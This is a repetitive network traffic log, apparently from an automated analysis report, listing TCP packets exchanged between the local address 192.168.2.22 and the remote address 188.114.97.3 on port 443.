Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
